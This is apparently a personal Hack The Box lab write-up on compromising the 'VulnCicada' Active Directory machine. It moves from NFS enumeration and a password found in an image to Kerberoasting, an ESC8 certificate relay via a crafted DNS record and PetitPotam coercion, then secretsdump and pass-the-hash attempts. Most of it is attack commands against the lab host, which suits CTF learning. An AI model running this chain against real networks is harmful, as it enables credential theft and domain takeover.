HTB - VULNCICADA - JA Smith

# TAKEAWAYS - xxx --- # BLUF - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260329140518.png]] - `nmap` scan - light ![[images/Pasted image 20260329140737.png]] - looks like a DC - Note: possible webserver on port 80 - `nmap` scan - detailed ![[images/Pasted image 20260329141310.png]] - Add `DC-JPQ225.cicada.vl` and `cicada.vl` to `/etc/hosts` - `nmap` scan - UDP ![[images/Pasted image 20260329140814.png]] --- # Service Enum ## Port 445 (SMB) ## Null Auth - Note: `NTLM:False` means we need to interact with Kerberos ![[images/Pasted image 20260329141900.png]] - We need to update the `/etc/krb5.conf` ```bash nxc smb DC-JPQ225.cicada.vl --generate-krb5-file vulncicada.krb sudo cp vulncicada.krb /etc/krb5.conf ``` ![[images/Pasted image 20260329142156.png]] - Still getting errors ![[images/Pasted image 20260329142821.png]] ## Port 2049 (NFS) - Initial enum ```bash nmap -p2049 10.129.234.48 -sC -sV -O --script nfs* showmount -e 10.129.234.48 ``` - Mount the remote share ``` mkdir NFS sudo mount -t nfs 10.129.234.48:/profiles ./NFS/ -o rw ``` - We have some names ![[images/Pasted image 20260329143300.png]] - Create `users.txt` ![[images/Pasted image 20260329152522.png]] - Run `tree` to discover files within dirs ![[images/Pasted image 20260329143706.png]] - Docs in `Rosie.Powell` dir showing nobody nogroup ownership - Let's move the images to our local drive ![[images/Pasted image 20260329152358.png]] - Now run `exiftool` ![[images/Pasted image 20260329150530.png]] - `marketing.png` has a password on the sticky note within the image ![[images/Pasted image 20260329150606.png]] - Confirm creds ![[images/Pasted image 20260329150831.png]] - Try uppercase > that works! ![[images/Pasted image 20260329151242.png]] --- # AD Enum ## Revisit SMB ### Password Policy - Nothing ![[images/Pasted image 20260329152151.png]] ### Shares - We have RW over `profiles

and access to `CertEnroll` ![[images/Pasted image 20260329152753.png]] - Crawl with `nxc smb [..] -M spider_plus` ```bash nxc smb DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M spider_plus ``` - `CertEnroll` has lots of cert templates and CA stuff - `profiles

has an `.ini` file in the Recycle Bin ![[images/Pasted image 20260329153023.png]] ### Users - Same local users as seen on NFS drive ![[images/Pasted image 20260329152716.png]] - Nothing interesting re: `rid-brute` ![[images/Pasted image 20260329152745.png]] ## ASREP Roasting ```bash nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k --asreproast asrep.out ``` ![[images/Pasted image 20260329151409.png]] ## Kerberoasting ```bash nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k --kerberoasting kerberoast.out ``` ![[images/Pasted image 20260329151439.png]] ## ADCS ```bash nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M adcs ``` - Cert attacks are on the menu! ![[images/Pasted image 20260329151533.png]] - enumerate templates ```bash kinit rosie.powell klist export KRB5CCNAME=/tmp/krb5cc_1000 certipy-ad find -target DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k ``` ![[images/Pasted image 20260329151824.png]] - enumerate template vulns - ESC8 vulnerability wrt the CA ```bash certipy-ad find -target DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -vulnerable -stdout ``` ![[images/Pasted image 20260329152023.png]] ![[images/Pasted image 20260329153446.png]] # ESC8 Exploit ## Attempt 1: `certipy-ad relay` and `PetitPotam.py` - Start a relay on Kali ```bash certipy-ad relay -target 'http://10.129.234.48' ``` ![[images/Pasted image 20260329164822.png]] - Setup `PetitPotam.py` > getting some errors ```bash sudo wget https://raw.githubusercontent.com/topotam/PetitPotam/refs/heads/main/PetitPotam.py sudo python3 PetitPotam.py -u rosie.powell -p "Cicada123" -d cicada.vl -k 10.10.14.197 10.129.234.48 ``` ![[images/Pasted image 20260329165736.png]] - Enumerate `PetitPotam` with `nxc smb [...] -M coerce_plus` ```bash nxc smb DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M coerce_plus ``` ![[images/Pasted image 20260329165844.png]] ## Attempt 2: `impacket-ntlmrelayx` and `PetitPotam.py` - Setup relay ```bash impacket-ntlmrelayx -t http://DC-JPQ225.cicada.vl/certsrv/ -smb2support --adcs --template User ``` ![[images/Pasted image 20260329170738.png]] - Run `PetitPotam.py` > invalid checksum ```bash python3 PetitPotam.py -d cicada.vl -u rosie.powell -p "Cicada123" -k 10.10.14.197 DC-JPQ225.cicada.vl ``` ![[images/Pasted image 20260329170846.png]] ## Attempt 3: Add DNS Record > `certipy-ad relay` and `nxc -M coerce_plus` - We cannot use the above because NTLM is disabled - Instead, we will add a DNS record that includes a serialized SPN that will trick the server into requesting a Kerberos ticket for the machine account but connects to the malicious record which points to the attacker - We can then relay that back to the DC to request a ticket - First, add a DNS record ```bash bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.197 ``` ![[images/Pasted image 20260329201531.png]] - Second, fire up the relay ```bash certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController ``` ![[images/Pasted image 20260329201617.png]] - Third, use the `nxc smb [..] -M coerce_plus -o LISTERNER=[DNS_Record} METHOD=PETITPOTAM` ```bash netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam ``` ![[images/Pasted image 20260329201848.png]] - Getting some errors ![[images/Pasted image 20260329202422.png]] ### Retry steps 2 and 3 - Step 2 - setup relay with long form LDAP name ```bash certipy-ad -debug relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController -subject CN=DC-JPQ225,CN=Computer,DC=cicada,DC=vl ``` - Step 3 - rerun `coerce_plus` module with `PetitPotam` method ```bash netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam ``` ![[images/Pasted image 20260329202813.png]] - Now we have `dc-jpq225.pfx` - Let's try `certipy-ad auth` with above `.pfx` ```bash certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48 ``` - We have the TGT and the NTLM hash for `dc-jpq225

![[images/Pasted image 20260329203235.png]] - NOTE: This is a machine account for which we cannot PtC or PtH - Use TGT with `secretsdump.py` ```bash KRB5CCNAME=dc-jpq225.ccache secretsdump.py -k -no-pass cicada.vl/dc-jpq225\[email protected] -just-dc-user administrator ``` ![[images/Pasted image 20260329203421.png]] - Now try to PtH with `evil-winrm` > fail - we need a TGT for administrator but we only have nthash ```bash evil-winrm -i 10.129.234.48 -u administrator -H nthash --realm cicada.vl ``` ![[images/Pasted image 20260329203955.png]] - Try to PtH with `psexec.py` ```bash psexec.py cicada.vl/[email protected] -k -hashes :nthash ``` ![[images/Pasted image 20260329204017.png]]